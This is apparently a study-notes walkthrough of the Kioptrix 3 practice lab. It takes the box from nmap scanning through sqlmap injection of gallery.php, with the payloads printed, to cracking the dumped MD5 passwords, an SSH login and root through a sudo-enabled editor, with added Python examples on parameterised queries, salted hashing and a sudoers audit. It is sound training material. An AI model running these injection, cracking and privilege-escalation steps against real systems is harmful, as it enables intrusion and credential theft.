NextCyber study notes: a detailed walkthrough of the Kioptrix 3 penetration-testing lab

Penetration-testing practice: Kioptrix 3

Pointing the hostname at the target

First, edit /etc/hosts so that the target's IP address resolves to kioptrix3.com. The lab's web application refers to itself by that hostname, so without the entry the site does not browse correctly.


Information gathering

Enumerate the target with nmap (all TCP ports, with service/version detection)

┌──(root㉿kali)-[~]
└─# nmap -sV -p- 10.19.243.8 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-31 21:47 EDT
Nmap scan report for kioptrix3.com (10.19.243.8)
Host is up (0.047s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.32 seconds

The scan of the target shows only two open ports: 22 (OpenSSH 4.7p1) and 80 (Apache 2.2.8 with PHP 5.2.4). Both versions date from 2008, which is worth noting for later. Let's see what the web service has to offer.


Browsing around the site, one of the buttons leads to another page; follow it.


That page has quite a bit of content. One of its navigation links leads to a gallery page whose listing can be sorted.


Clicking the sort control produces a URL ending in the familiar pattern .php?id=1 (the page is /gallery/gallery.php). So the site is written in PHP, and a numeric id parameter that selects a database row is the classic candidate for SQL injection. A quick manual test, for example appending a single quote to the id value, tells us whether the value reaches the query unsanitised.


Sure enough, the response contains a database error message: the parameter is spliced into a query unsanitised, and the application leaks the DB error to the client (which is what makes error-based injection possible later). Rather than extracting data by hand, hand the URL to sqlmap.
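Why a numeric id parameter ends up injectable, and what the fix looks like, as an added example that is not the lab's code: the gallery on Kioptrix 3 is PHP on MySQL, but the defect (pasting the request value into the SQL text) and its fix (a bound parameter after type validation) look the same in Python with sqlite3, which is used here so the example runs stand-alone. Table names mirror those sqlmap enumerates further down; every row is constructed sample data, and the UNION payload has 3 columns to match this toy table rather than the 6 of the real page.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the MySQL 'gallery' database.

    Table names follow what sqlmap enumerates later (gallarific_photos,
    dev_accounts); every row here is constructed sample data, not the lab's.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE gallarific_photos (id INTEGER, title TEXT, path TEXT)")
    conn.execute("CREATE TABLE dev_accounts (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO gallarific_photos VALUES (?, ?, ?)",
                     [(1, "Sunset", "/img/1.jpg"), (2, "Harbour", "/img/2.jpg")])
    conn.executemany("INSERT INTO dev_accounts VALUES (?, ?, ?)",
                     [(1, "alice", "0123456789abcdef0123456789abcdef")])
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, id_param: str) -> list:
    """The bug class behind 'gallery.php?id=1': the raw query-string value is
    concatenated into the SQL text, so it is parsed as SQL, not as a number."""
    sql = "SELECT id, title, path FROM gallarific_photos WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, id_param: str) -> list:
    """The fix: validate the type, then bind the value as a parameter.
    The engine receives the value as data; it can never change the query's shape."""
    try:
        photo_id = int(id_param)
    except ValueError:
        raise ValueError("id must be an integer") from None
    sql = "SELECT id, title, path FROM gallarific_photos WHERE id=?"
    return conn.execute(sql, (photo_id,)).fetchall()


def triggers_db_error(conn: sqlite3.Connection, id_param: str) -> bool:
    """The manual probe from the walkthrough: does a stray quote make the
    database itself complain? A leaked DB error is what sqlmap later turns
    into 'error-based' extraction."""
    try:
        vulnerable_lookup(conn, id_param)
    except sqlite3.OperationalError:
        return True
    return False


# sqlmap's 'UNION query' technique: the attacker-chosen SELECT must have the
# same number of columns as the original (3 here; 6 on the real gallery page).
UNION_PAYLOAD = "1 UNION ALL SELECT id, username, password FROM dev_accounts"

if __name__ == "__main__":
    db = build_db()
    print("quote probe raises DB error:", triggers_db_error(db, "1'"))
    print("vulnerable:", vulnerable_lookup(db, UNION_PAYLOAD))   # second row is dev_accounts data
    try:
        safe_lookup(db, UNION_PAYLOAD)
    except ValueError as exc:
        print("safe:", exc)
```

The concatenating version returns the gallery row followed by a row from dev_accounts, which is exactly how sqlmap's UNION technique reads other tables; the parameterised version rejects the same input before it ever reaches the database.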

Exploitation

┌──(root㉿kali)-[~]
└─# sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=1 --batch
        ___
       __H__                                                                                                                                        
 ___ ___[(]_____ ___ ___  {1.9.3#stable}                                                                                                            
|_ -| . ["]     | .'| . |                                                                                                                           
|___|_  [(]_|_|_|__,|  _|                                                                                                                           
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:56:47 /2025-07-31/

[21:56:47] [INFO] resuming back-end DBMS 'mysql' 
[21:56:47] [INFO] testing connection to the target URL
[21:56:48] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=049c9d2497e...db95f9023e'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (7990=7990) THEN 1 ELSE (SELECT 8737 UNION SELECT 7922) END))

    Type: error-based
    Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: id=1 OR ROW(2599,6205)>(SELECT COUNT(*),CONCAT(0x7162767a71,(SELECT (ELT(2599=2599,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM (SELECT 7301 UNION SELECT 2377 UNION SELECT 3595 UNION SELECT 3590)a GROUP BY x)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 6883 FROM (SELECT(SLEEP(5)))DXsr)

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x7162767a71,0x5249726a4e4b56464844684966704153554679627278474356584a454b667164556c794544697073,0x7162716b71),NULL,NULL,NULL,NULL-- -
---
[21:56:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8, PHP
back-end DBMS: MySQL >= 4.1
[21:56:48] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[21:56:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/kioptrix3.com'
[*] ending @ 21:56:48 /2025-07-31/

What sqlmap's output tells us:

The GET parameter id is injectable by four techniques:

Boolean-based blind
Error-based (the MySQL FLOOR/RAND trick, usable because the page echoes database errors)
Time-based blind (SLEEP)
UNION query (the original SELECT has 6 columns)

Target environment:

DBMS: MySQL (version >= 4.1)
Operating system: Linux, Ubuntu 8.04 (Hardy Heron), long out of support
Web stack: PHP 5.2.4 (end of life, with known vulnerabilities) on Apache 2.2.8
Session handling: the server sets a PHPSESSID cookie, which --batch accepted automatically

The lines "resuming back-end DBMS 'mysql'" and "resumed the following injection point(s) from stored session" show that the detection phase had already been run once against this URL; sqlmap stores its findings under ~/.local/share/sqlmap/output/<host>/ and reuses them on later runs. With UNION and error-based injection available, extraction costs a handful of requests per query rather than several requests per character, which is why the enumeration below completes in a couple of seconds.

The parameter is injectable, so enumerate the database.

Listing the databases (sqlmap accepted the abbreviated spelling used here; the documented option is --dbs)

┌──(root㉿kali)-[~]
└─# sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=1 -dbs
[sqlmap banner and legal disclaimer omitted; identical to the first run]

[*] starting @ 22:00:00 /2025-07-31/

[22:00:00] [INFO] resuming back-end DBMS 'mysql' 
[22:00:00] [INFO] testing connection to the target URL
[22:00:00] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=fbac6fcbd66...31eed2e58d'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
[the same four injection points as in the first run]
[22:00:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, PHP, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[22:00:02] [INFO] fetching database names
[22:00:02] [INFO] resumed: 'information_schema'
[22:00:02] [INFO] resumed: 'gallery'
[22:00:02] [INFO] resumed: 'mysql'
available databases [3]:                                                                                                                       

[*] gallery
[*] information_schema
[*] mysql

[22:00:02] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[22:00:02] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/kioptrix3.com'

[*] ending @ 22:00:02 /2025-07-31/

Listing the tables of the gallery database (documented option: --tables)

┌──(root㉿kali)-[~]
└─# sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=1 -D gallery -tables
[sqlmap banner and legal disclaimer omitted; identical to the first run]

[*] starting @ 22:00:50 /2025-07-31/

[22:00:50] [INFO] resuming back-end DBMS 'mysql' 
[22:00:50] [INFO] testing connection to the target URL
[22:00:50] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=eca7c3bb0f0...13e04f5ae7'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
[the same four injection points as in the first run]
[22:00:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8, PHP
back-end DBMS: MySQL >= 4.1
[22:00:52] [INFO] fetching tables for database: 'gallery'
[22:00:52] [INFO] retrieved: 'dev_accounts'
[22:00:52] [INFO] retrieved: 'gallarific_comments'
[22:00:52] [INFO] retrieved: 'gallarific_galleries'
[22:00:52] [INFO] retrieved: 'gallarific_photos'
[22:00:52] [INFO] retrieved: 'gallarific_settings'
[22:00:52] [INFO] retrieved: 'gallarific_stats'
[22:00:52] [INFO] retrieved: 'gallarific_users'
Database: gallery                                                                                                                                  
[7 tables]
+----------------------+
| dev_accounts         |
| gallarific_comments  |
| gallarific_galleries |
| gallarific_photos    |
| gallarific_settings  |
| gallarific_stats     |
| gallarific_users     |
+----------------------+

[22:00:52] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[22:00:52] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/kioptrix3.com'

[*] ending @ 22:00:52 /2025-07-31/

Listing the columns of the dev_accounts table (documented option: --columns)

┌──(root㉿kali)-[~]
└─# sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=1 -D gallery -T dev_accounts --column
[sqlmap banner and legal disclaimer omitted; identical to the first run]

[*] starting @ 22:02:11 /2025-07-31/

[22:02:11] [INFO] resuming back-end DBMS 'mysql' 
[22:02:11] [INFO] testing connection to the target URL
[22:02:12] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=5cb71deb5f8...d5848c1863'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
[the same four injection points as in the first run]
[22:02:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8, PHP
back-end DBMS: MySQL >= 4.1
[22:02:13] [INFO] fetching columns for table 'dev_accounts' in database 'gallery'
[22:02:13] [INFO] retrieved: 'id','int(10)'
[22:02:13] [INFO] retrieved: 'username','varchar(50)'
[22:02:13] [INFO] retrieved: 'password','varchar(50)'
Database: gallery                                                                                                                                  
Table: dev_accounts
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(10)     |
| password | varchar(50) |
| username | varchar(50) |
+----------+-------------+

[22:02:13] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[22:02:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/kioptrix3.com'

[*] ending @ 22:02:13 /2025-07-31/

Dumping the usernames and passwords

(Answer yes to every prompt: sqlmap recognises the password column as hashes, writes them to a temporary file and offers to run its dictionary attack on them.)

┌──(root㉿kali)-[~]
└─# sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=1 -D gallery -T dev_accounts --dump
[sqlmap banner and legal disclaimer omitted; identical to the first run]

[*] starting @ 22:04:47 /2025-07-31/

[22:04:47] [INFO] resuming back-end DBMS 'mysql' 
[22:04:47] [INFO] testing connection to the target URL
[22:04:47] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=f4fa4c99f41...f196129430'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
[the same four injection points as in the first run]
[22:04:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP, Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 4.1
[22:04:49] [INFO] fetching columns for table 'dev_accounts' in database 'gallery'
[22:04:49] [INFO] resumed: 'id','int(10)'
[22:04:49] [INFO] resumed: 'username','varchar(50)'
[22:04:49] [INFO] resumed: 'password','varchar(50)'
[22:04:49] [INFO] fetching entries for table 'dev_accounts' in database 'gallery'                                                                  
[22:04:49] [INFO] resumed: '1','0d3eccfb887aabd50f243b3f155c0f85','dreg'
[22:04:49] [INFO] resumed: '2','5badcaf789d3d1d09794d8f021f40f0e','loneferret'
[22:04:49] [INFO] recognized possible password hashes in column 'password'                                                                         
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] Y
[22:04:50] [INFO] writing hashes to a temporary file '/tmp/sqlmapj3q6uhvj15709/sqlmaphashes-y0ylstji.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[22:04:54] [INFO] using hash method 'md5_generic_passwd'
[22:04:54] [INFO] resuming password 'Mast3r' for hash '0d3eccfb887aabd50f243b3f155c0f85' for user 'dreg'
[22:04:54] [INFO] resuming password 'starwars' for hash '5badcaf789d3d1d09794d8f021f40f0e' for user 'loneferret'
Database: gallery
Table: dev_accounts
[2 entries]
+----+---------------------------------------------+------------+
| id | password                                    | username   |
+----+---------------------------------------------+------------+
| 1  | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   | dreg       |
| 2  | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret |
+----+---------------------------------------------+------------+

[22:04:54] [INFO] table 'gallery.dev_accounts' dumped to CSV file '/root/.local/share/sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv'
[22:04:54] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[22:04:54] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/kioptrix3.com'

[*] ending @ 22:04:54 /2025-07-31/

We now have passwords for the users dreg and loneferret. Both were stored as unsalted MD5, so sqlmap's built-in dictionary attack recovered them instantly (the hash list was also written to /tmp for use with other crackers had that failed). The table name dev_accounts suggests developer accounts, and developers often reuse passwords for system logins, so the next step is to try them over SSH.
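The cracking step that sqlmap performed automatically, written out as an added example (not sqlmap's code). The two digests are the ones dumped above; the word list is a constructed handful of candidates standing in for a real dictionary. The second half shows the storage format the application should have used, with the storage string format being this example's own convention, so the difference is visible: with a random per-user salt and a slow KDF, one guess no longer tests every account at once.

```python
import hashlib
import hmac
import os

# password column of gallery.dev_accounts as dumped above (username -> hash)
DUMPED = {
    "dreg": "0d3eccfb887aabd50f243b3f155c0f85",
    "loneferret": "5badcaf789d3d1d09794d8f021f40f0e",
}

# Constructed stand-in for a real word list such as rockyou.txt.
WORDLIST = ["password", "123456", "letmein", "Mast3r", "qwerty", "starwars", "admin"]


def looks_like_md5(value: str) -> bool:
    """The same heuristic sqlmap applies before offering to crack: 32 hex digits."""
    return len(value) == 32 and all(c in "0123456789abcdef" for c in value.lower())


def crack_md5(hashes: dict, wordlist) -> dict:
    """Dictionary attack on unsalted MD5.

    One digest per candidate word is compared against every user's hash at
    once, so the cost is independent of the number of accounts. That is why
    sqlmap recovers a whole table in about a second."""
    by_digest = {h.lower(): user for user, h in hashes.items() if looks_like_md5(h)}
    found = {}
    for word in wordlist:
        digest = hashlib.md5(word.encode()).hexdigest()
        if digest in by_digest:
            found[by_digest[digest]] = word
    return found


def store_password(password: str, rounds: int = 200_000) -> str:
    """What the application should store: random per-user salt plus a slow KDF.
    Storage format (this example's own convention): pbkdf2_sha256$rounds$salt_hex$digest_hex."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return f"pbkdf2_sha256${rounds}${salt.hex()}${dk.hex()}"


def verify_password(stored: str, password: str) -> bool:
    algo, rounds, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unknown hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)   # constant-time comparison


if __name__ == "__main__":
    print(crack_md5(DUMPED, WORDLIST))          # {'dreg': 'Mast3r', 'loneferret': 'starwars'}
    a, b = store_password("starwars"), store_password("starwars")
    print(a != b, verify_password(a, "starwars"))   # True True
```

Two users with the same password get different salted digests, so a cracked hash reveals nothing about other accounts, and each guess costs a full PBKDF2 run per account instead of one MD5 for the whole table.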

SSH login and privilege escalation

SSH login

┌──(root㉿kali)-[~]
└─# ssh loneferret@kioptrix3.com                             
Unable to negotiate with 10.19.243.8 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

The error means the client (Kali) and the server could not agree on a host-key algorithm. The server runs OpenSSH 4.7 from 2008 and only offers ssh-rsa and ssh-dss, both of which sign with SHA-1; OpenSSH clients have disabled ssh-dss by default since 7.0 and ssh-rsa since 8.8, so the two sides have no algorithm in common. As the message hints, re-enable ssh-rsa for this connection with -oHostKeyAlgorithms=+ssh-rsa and try again.

What the option means:
-o introduces an SSH client configuration option, equivalent to a line in ~/.ssh/config; HostKeyAlgorithms lists the host-key types the client will accept from the server.
=+ssh-rsa: the leading + appends ssh-rsa to the default list. Without the + (HostKeyAlgorithms=ssh-rsa) the default list is replaced and only ssh-rsa is accepted. This setting only governs which host keys the client trusts; a key-based login would additionally need PubkeyAcceptedAlgorithms relaxed for the same reason, but the password login used here does not.

┌──(root㉿kali)-[~]
└─# ssh -oHostKeyAlgorithms=+ssh-rsa loneferret@kioptrix3.com 
The authenticity of host 'Kioptrix3 (10.19.243.8)' can't be established.
RSA key fingerprint is SHA256:NdsBnvaQieyTUKFzPjRpTVK6jDGM/xWwUi46IR/h1jU.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:7: [hashed name]
    ~/.ssh/known_hosts:27: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'Kioptrix3' (RSA) to the list of known hosts.
loneferret@Kioptrix3's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$

SSH login succeeded with the password recovered from the database.

Privilege escalation

loneferret@Kioptrix3:~$ ls -la
total 64
drwxr-xr-x 3 loneferret loneferret  4096 2011-04-17 08:59 .
drwxr-xr-x 5 root       root        4096 2011-04-16 07:54 ..
-rw-r--r-- 1 loneferret users         13 2011-04-18 11:44 .bash_history
-rw-r--r-- 1 loneferret loneferret   220 2011-04-11 17:00 .bash_logout
-rw-r--r-- 1 loneferret loneferret  2940 2011-04-11 17:00 .bashrc
-rwxrwxr-x 1 root       root       26275 2011-01-12 10:45 checksec.sh
-rw-r--r-- 1 root       root         224 2011-04-16 08:51 CompanyPolicy.README
-rw------- 1 root       root          15 2011-04-15 21:21 .nano_history
-rw-r--r-- 1 loneferret loneferret   586 2011-04-11 17:00 .profile
drwx------ 2 loneferret loneferret  4096 2011-04-14 11:05 .ssh
-rw-r--r-- 1 loneferret loneferret     0 2011-04-11 18:00 .sudo_as_admin_successful
loneferret@Kioptrix3:~$ cat CompanyPolicy.README 
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO

Listing the home directory shows a root-owned file, CompanyPolicy.README, which tells new employees to use 'sudo ht' for editing, creating and viewing files. So ht is some editor that loneferret may run under sudo, that is, as root. The first attempt fails with "Error opening terminal: xterm-256color": the 2009-era system has no terminfo entry for the xterm-256color terminal type that the Kali terminal advertises, so the curses-based editor cannot initialise. Setting TERM=xterm, an entry every system has, fixes that. (TERM tells terminal applications which terminal capabilities to assume; export makes the new value visible to the programs started from this shell, including the one run via sudo.)

loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$ export TERM=xterm
loneferret@Kioptrix3:~$ sudo ht

Run sudo ht again. It is indeed an editor (HT, a hex/text editor), and because it runs as root it can open and save any file on the system. A sudo rule for an editor is therefore equivalent to full root, and the obvious target is /etc/sudoers itself.


The F1-F10 menu at the bottom of the editor lists its functions. Press F3 (open), type /etc/sudoers and press Enter to load the file.


Add an entry allowing loneferret to run /bin/sh (or /bin/bash) to the file. The commands in a sudoers command list are separated by commas, so do not forget the comma; a syntax error makes the file unparsable, and a broken /etc/sudoers disables sudo for every user, which is why visudo, which checks the syntax before saving, is the normal way to edit it. Press F2 to save and F10 to exit, then run the shell through sudo:

loneferret@Kioptrix3:~$ sudo /bin/sh
# whoami
root

Root obtained.
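A check a defender would want after this: an audit of sudoers rules for grants that are effectively root, such as an editor runnable under sudo. Added example, not the lab's code or configuration; the sudoers text it parses is a constructed sample that resembles the Kioptrix 3 situation (one user allowed to run ht, with su excluded) and is not a copy of the box's /etc/sudoers. The parser handles only plain user host=(runas) [TAG:] command lines; aliases and Defaults are skipped, and the root-equivalent program list is a short illustrative subset.

```python
import re

# Programs that can read/write arbitrary files or spawn a shell when run with
# elevated privileges; a sudo rule for any of them is a root-equivalent grant.
# (Short illustrative list; GTFOBins maintains the full catalogue.)
ROOT_EQUIVALENT = {"ht", "vi", "vim", "nano", "emacs", "ed", "less", "more",
                   "sh", "bash", "dash", "python", "perl", "awk", "find"}

# Constructed sample resembling the Kioptrix 3 setup; not the box's file.
SUDOERS_SAMPLE = """\
Defaults env_reset
root       ALL=(ALL) ALL
%admin     ALL=(ALL) ALL
# editor policy for new employees
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
"""

# user host=(runas) [TAG:] cmnd, cmnd ...   (aliases and Defaults are not handled)
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)=(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmnds>.+)$")
TAG_RE = re.compile(r"\b(?:NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV)\s*:\s*")


def parse_sudoers(text: str) -> list:
    """Return one dict per user specification line."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blanks
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        spec = m.group("cmnds")
        rules.append({
            "user": m.group("user"),
            "runas": m.group("runas") or "root",
            "nopasswd": "NOPASSWD" in spec,
            "commands": [c.strip() for c in TAG_RE.sub("", spec).split(",") if c.strip()],
        })
    return rules


def audit(text: str) -> list:
    """Return (user, command, reason) for every grant that is effectively root."""
    findings = []
    for rule in parse_sudoers(text):
        if rule["user"] == "root":
            continue                              # root gaining root is not a finding
        for cmd in rule["commands"]:
            if cmd.startswith("!"):
                # sudoers(5): subtracting commands with '!' is not an effective
                # restriction; a copy of the binary under another name bypasses it.
                findings.append((rule["user"], cmd, "negated entry gives no protection"))
                continue
            prog = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                reason = "unrestricted command list"
            elif prog in ROOT_EQUIVALENT:
                reason = f"{prog} can open and save any file as {rule['runas']}, e.g. /etc/sudoers"
            else:
                continue
            if rule["nopasswd"]:
                reason += "; no password required"
            findings.append((rule["user"], cmd, reason))
    return findings


if __name__ == "__main__":
    for user, cmd, reason in audit(SUDOERS_SAMPLE):
        print(f"{user:12} {cmd:22} {reason}")
```

On a real host feed it the output of `sudo cat /etc/sudoers` (or the files under /etc/sudoers.d); the same rule shape is what `sudo -l` prints for the current user, which is the first thing to check after landing on a box like this one.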

This lab is hosted by NextCyber; if you are interested in penetration testing, the platform is worth a look.
Address: nextcyber